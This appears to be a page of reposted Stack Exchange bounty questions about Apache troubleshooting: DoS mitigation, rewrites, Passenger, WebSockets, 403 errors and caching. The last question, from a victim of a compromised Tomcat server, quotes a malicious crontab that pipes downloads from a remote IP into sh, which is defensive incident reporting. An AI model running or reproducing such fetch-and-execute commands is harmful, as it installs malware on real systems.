#StackBounty: #webserver #apache #ddos Is mod_reqtimeout a sufficient and safe technique to mitigate Slow HTTP DoS Attacks?

Bounty: 50

We’ve been looking into configuring apache against the Slow HTTP DoS Attacks and stumbled upon this article, which goes over multiple techniques and apache configuration options.

mod_reqtimeout module looks promising and we are considering enabling it, but not everything is clear about it at the moment:

  • what header, body and minRate settings are considered best practices and what things should we take into account when choosing the values?
  • can enabling mod_reqtimeout potentially impact web applications running on this web server? And, if yes, what possible problems should we expect?


Get this bounty!!!

#StackBounty: #apache #.htaccess #redirect htaccess if url contains string redirect to page without changing url

Bounty: 50

I have a URL like domain.co.uk/product-name.html

I want to redirect any URL’s that contain the string html to search.php but I want to keep the original url that was typed in, so if domain.co.uk/product-name.html was redirected to search.php it should still show domain.co.uk/product-name.html in the browser

I am using:

RewriteCond %{REQUEST_URI} html
RewriteRule .* search.php

Which redirects but does not keep the original typed URL in the browser.

How can I do this?


Get this bounty!!!

#StackBounty: #ruby-on-rails #apache #ubuntu #capistrano #passenger Passenger doesn't seem to be running (Capistrano/Rails/Apache/U…

Bounty: 50

Deploying a Rails app using Capistrano to an Ubuntu VM running Apache with Passenger enabled.

I followed this tutorial: https://www.phusionpassenger.com/library/install/apache/install/oss/trusty/ with a few changes given that I’m on 17.04, not 14.04 LTS.

passenger-config validate-install says everything looks fine with both Passenger and Apache. passenger-memory-stats shows both Passenger and Apache processes.

I have sudo apache2ctl restarted several times, with no warnings. But passenger-status, and therefore the passenger-config restart-app that Capistrano runs, reports that Passenger “doesn’t seem to be running.” So my deploy stops.

There’s only one Ruby on the machine, ruby-2.4.1 installed using ruby-install. I have apt-get update and upgraded in case of version mismatches.

Apache logs don’t show any errors, certainly none related to Passenger.

Why would Passenger internally disagree, saying that it’s both configured properly and there are processes running, but then later saying that it’s not running?


Get this bounty!!!

#StackBounty: #node.js #apache #socket.io #phpwebsocket #phpws Trying to create a socket between servers with SocketIO and PHPws

Bounty: 50

I’m having a bit of an issue with websockets. So, I have a Rpi that provides me some data through a socketIO client in a pretty simple way. The following code shows how do I get to get this data:

<!DOCTYPE html>
<html>
<header>
    <title>SocketIO test</title>
    http://192.168.5.5:8000/socket.io/socket.io.js
</header>
<body>
    
        var client = io.connect('http://192.168.5.5:8000');
        client.on('connect', function() {
            console.log('connected');
        });
        client.on('raw', function(data){
            console.log(data);
        });
        client.on('state', function(data){
            console.log(data);
        });
    
</body>

However, what I need to implement is a little bit more complex. I need to use a Apache server to trait some of the data before it gets to the client side. The following image shows what I attempt to build:

enter image description here

To reach my goal I tried several WebSocket Servers and Client libraries for PHP until I found PHPws, which looks like the best solution for my scenario.
So, I read the examples, I test them and everything went well until I tried to connect to the Rpi with the following code:

require_once("../vendor/autoload.php");
$loop = ReactEventLoopFactory::create();
$logger = new ZendLogLogger();
$writer = new ZendLogWriterStream("php://output");
$logger->addWriter($writer);

$client = new DevristoPhpwsClientWebSocket("ws://192.168.5.5:8000", $loop, $logger);
$client->on("connect", function() use ($logger, $client){
    $logger->notice("Or we can use the connect event!");
    $client->send("Hello world!");
});
$client->on("raw", function($message) use ($client, $logger){
    $logger->notice("Got message: ".$message->getData());
    $client->close();
});
$client->open()->then(function() use($logger, $client){
    $logger->notice("We can use a promise to determine when the socket has been connected!");
});
$loop->run();

I’ve more or less taken this example from Devristo’s github.

From the server side, the execution of the program is not throwing any error or message.

Is it possible to build what I want to build here with PHPws?
If so, am I connecting properly to de Rpi server with PHPws sample code shown?


Get this bounty!!!

#StackBounty: #apache #http-status-code-403 #plesk Random 403 error with apache 2.2 and Plesk 12.5

Bounty: 50

I face strange random 403 error on a Debian serveur with Plesk 12.5 and apache 2.2.

There are several domains on the server but only one domain faces this.

Rondomly, it seems that it tries to display the directory listing instead of serve the index.php file. So, sometimes, it through a 403 error and when refresh the page, it’s ok with a 200 status.

In error_log, I read lots of :

[error] [client xxx.xxx.xxx.xxx] Directory index forbidden by Options directive

The DirectoryIndex was not present in httpd.conf file so I added the rule in additional directives for the domain via the Plesk Web Interface with no luck.

I’m kind of stuck with this.

Any help would be appreciated.

Let me know if you need more info.

Thank you.


Get this bounty!!!

#StackBounty: #php #apache #http-status-code-403 #fpm Random 403 errors with apache+php-fpm

Bounty: 100

On a server of mine, running Ubuntu 14.04.5 with Apache 2.4.23 and php-fpm 7.0.11, I’m getting random 403 errors.

I say “random” because the page I see in logs with 403 are running fine when I try them. Also, I experienced directly (I mean by visiting a site on the server with my browser) that I got a 403 error, then retried (just refreshing) and I got a 200.

The server is running some websites (about a dozen), with various kind of solutions (a couple of WordPress, a few old spaghetti php apps, mostly modern apps based on Symfony framework).

I’d also be happy if someone can point me to some way to increase the verbosity of some logs, to try resolving this issue on myself. Currently I see the 403 errors in the apache logs of vhosts.


Get this bounty!!!

#StackBounty: #apache #polymer Polymer app not loading when using Apache reverse proxy

Bounty: 50

I have a Polymer app running on port 5901 of my VM, and am using Apache reverse proxy to serve the app from the following URL:

http://www.example.com/polymer

The problem is when I go to the URL in a browser, I can see the page title but the page is blank. I also get this error in the console:

Failed to load resource: the server responded with a status of 404 (Not Found)   src/home-page.html

I’m assuming that I have to somehow add the /polymer subdomain to the default URL for the app, but I’m not sure how to do this.


Get this bounty!!!

#StackBounty: #php #apache #caching #xampp How to disable Apache caching in Apache-XAMPP?

Bounty: 50

I am having this weird problem with my XAMPP-Apache.
I am making an log-in system where form is posted to redirect.php page.
I updated the redirect.php and but still it is showing me the same old result.
There is not even a single line to redirect(header fn call) it to another page but still it redirects to home.php page as it was doing in older script.
I tried clearing cache of my browser and changing the browser for testing but didn’t work…I even tried rebooting the server but no change.
Please help me through….


Get this bounty!!!

#StackBounty: #linux #apache #shell #security #tomcat Shell script attack on Apache server, via an corn job of unknown origin

Bounty: 50

While running a project war on Apache tomcat server I found that the server has been compromised.

While running the war on an unknown cron is running like this

[root@PaygateApp2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

The downloaded logo.jpg has a shell script which is downloading a malware.

I found a similar issue on this website below

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

and

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

I am unable to find the origin of this cron job scheduler in my whole code.

This cron job

What I wish to know that has anyone faced this issue?
and how should I go about finding the origin of the cron job in code.

Note :

I am working on a JAVA(Struts 2)+jsp+javascript+jquery web project.

This cron job is running every time I am starting my tomcat with the war file of the project, but I am not able to find any scheduler for cron job in my code


Get this bounty!!!